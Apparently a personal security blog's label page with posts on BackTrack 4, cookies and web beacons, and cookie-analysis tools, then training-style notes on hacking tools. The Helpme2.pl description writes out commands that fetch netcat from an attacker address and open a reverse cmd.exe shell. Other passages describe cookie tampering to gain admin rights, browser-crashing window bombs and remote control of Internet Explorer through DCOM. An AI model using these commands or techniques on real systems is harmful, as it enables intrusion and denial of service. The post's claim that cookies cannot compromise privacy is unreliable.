Contact Me @ +91-9041922099

Mail me at [email protected]
Showing posts with label Cookies. Show all posts
Showing posts with label Cookies. Show all posts

Tuesday, February 14, 2012

Backtrack 4 Download for Windows VMWare & Torrents

BackTrack is a live CD Linux distribution that focuses on penetration testing. A merger of two older security-related distros — Whax and Auditor Security Collection — BackTrack bundles more than 300 security tools.

BackTrack is based on the SLAX distribution (a live CD derived from Slackware) and runs a patched 2.6.20 kernel. It offers users both KDE and Fluxbox desktop environments.
To start using BackTrack, download the ISO image and burn it to a CD. Insert the disc and boot your machine. Once booted, the system start at runlevel 3 (text mode), where you must log in as root and choose whether to start KDE or Fluxbox or just use the terminal.

BackTrack provides clear, concise instructions for logging in, starting the window manager, and configuring the video card before you see the login prompt. If you’ve never used BackTrack before, use a graphical environment, since it will help you understand how all the included applications are organized and let you take advantage of some graphical utilities. When the window manager comes up you’ll find some ordinary desktop programs, such as Firefox, Gaim, K3b, and XMMS, within a nice environment with beautiful wallpaper and window transparency.

Don’t let the attractive appearance fool you — BackTrack packs a punch. The security tools are arranged inside a Backtrack submenu. This is a big improvement over older releases, because you can easily follow an attack methodology: starting by collecting information and end by hiding your actions.

The tools are arranged in 12 categories, such as vulnerability identification, penetration, privilege escalation, radio network analysis, and reverse engineering. Among the more than 300 security tools you’ll find such familiar names as the Metasploit Framework, Kismet, Nmap, Ettercap, and Wireshark (previously known as Ethereal).

One of the core points of this release is the attention to detail. For example, when you choose most of the programs from the Backtrack menu, a console window opens with the output of the program’s help. Some tools have been bundled with scripts that in a few steps configure and run the program for you. For example, if you run the Snort intrusion detection application, a script asks for some passwords and then sets up MySQL, Apache, Base, and Snort itself so you can easy browse alert logs via a Web browser.

If you open Firefox or Konqueror you’ll find some useful security-oriented bookmarks. In the Documents submenu the developers have included PDF manuals for the ISSAF and OSSTMM security methodologies. There are also some tools that you wouldn’t expect inside a live CD; for example, you have a popular debugger for Windows, OllyDbg, which runs fine through Wine, so you can even debug .exe files.

If you like the live CD, you can install BackTrack to a hard drive (decompressed, it requires 2.7GB of space) or USB memory stick (compressed, 700MB) using a graphical wizard.
While BackTrack is an excellent tool, nothing is perfect. Unfortunately it doesn’t include Nessus, the popular security scanner, due to license problems. I tried to start PostgreSQL from the Services menu, but it gave an error. And it seems as if the developers forgot to update the Backtrack menu in Fluxbox, because it offers the previous version arrangement. Tools like VMware and Nessus appear on the menu but are broken links because they have been removed from this release.

Despite a few little bugs and problems, BackTrack is the best distribution I’ve found for handling security-oriented tasks out of the box.

Download Links :

Last Update: 11.01.2010
Description: Image Download
Name:: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269



Description: VM Image Download
Name:: bt4-final-vm.zip
Size: 2000 MB
MD5: 733b47fad1d56d31bc63c16b3706a11c



FOR OLDER VERSIONS CLICK HERE

To learn HOW TO USE BACKTRACK & for all BACKTRACK TUTORIALS & COMMANDS: CLICK HERE & JOIN THIS FORUM

Friday, March 18, 2011

Cookies are bad for privacy - Is that true?

This is a myth - cookies are a friendly internet tool primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:
  1. Protection - to ensure you are a genuine visitor and not someone else using your password.
  2. Authenticate and speed up your identification and e-commerce transactions.
  3. Recognise preferences e.g. remember user names and passwords for websites.
  4. Cap the frequency of ad serving and to make sure that advertisements are rotated and not duplicated during any one visit to a site
Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory, they can understand what that cookie does on a number of different sites.

What are Web Beacons OR Web Bugs?

Web beacons, also called web bugs and clear GIFs are used in combination with cookies to help people running websites to understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple actions of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen at the time they typically contains a number of instructions, or tags' that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way certain simple information can also be gathered, such as: the IP address of your computer; time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third-party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with pages. To see the demonstration how web beacons work, CLICK HERE.

Learn How to collecting and analyzing cookies Using COOKIEDIGGER

CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.


SOURCE: http://www.foundstone.com

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA

Many important files within Microsoft Windows have structures that are undocumented. One of the principals of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there are a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer Cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word meaning "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a Cookie file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: galleta [options]
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB delimited file in MS Excel to further sort and filter your results


SOURCE: http://www.foundstone.com

What is Cookie ?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering HTTP is stateless, this may simply be between requests for documents in a same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying show this to me next time you come in. Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A can't read Domain B's cookies, but there have been much vulnerability in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as/reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable (in this case Apache).

The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies per server or domain is allowed.

Cookies are the preferred method to maintain state in HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

Example from a real world example

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to;

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

Hacking Tool: Helpme2.pl
  • Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.

  • This tool generates an HTML file with a given hidden command.

  • When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is an exploit code written to take advantage of the winhelp32.exe vulnerability. The perl script takes a command to execute (WinExec, SW_HIDE) and gives an html output file. There are two versions

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

  1. Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe

  2. Executes nc.exe attacker.ip.address 80-e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb


An email sent with such html files attached will create pop-up windows until the PC's memory gets exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. These can be such as the ones seen include:

Deadly image

A. GIF which crashes the browser on clicking.

Uncloseable window

Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.

Invincible alert dialogue

Executes a function which generates an alert dialogue and then runs the function again

Reload-o-rama

Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.

Window spawner

Continuously opens new windows until the ram or swap space is full.

Jiggy window

Causes the window to dance around on the screen so fast that the controls cannot be reached.

Jiggy window spawner

Creates and endless stream of little dancing windows.

While loop processor hog

executes an endless loop to chew up some processor time

Recursive frames

Opens a set of recursive frames until the ram or swap space is full.

Memory bomb

Dynamically allocates ram to the browser until the ram or swap space is full.

Super memory bomb

Opens a 100K document with numerous recursive tables and ordered lists.

Hacking Tool: IEEN

http://www.securityfriday.com/ToolDownload/IEen

  • IEEN remotely controls Internet Explorer using DCOM.

  • If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without noticed by the users.

However, if an attacker knew the account name and the password of a remote machine, he can remotely control the software component on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

  • Remotely connects to or activates Internet Explorer

  • Captures data sent and received using Internet Explorer

  • Even on SSL encrypted websites (e.g. Hotmail); IE'en can capture user ID and password in plain text.

  • Change the web page on the remote IE window.

  • Make the remote IE window visible / invisible

---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.

  • Generally nobody notices web application penetration, until serious damage has been done.

  • Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures.

  • Various tools help the attacker to view the source codes and scan for security holes.

  • The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / "secure" cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.

  • A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.

  • If the application accepts only expected input, then the XSS can be significantly reduced.

---Regards,
Amarjit Singh

 
Design by Amarjit Singh | Idea From Blogging Tutorials - Premium Themes | Best Buy Coupons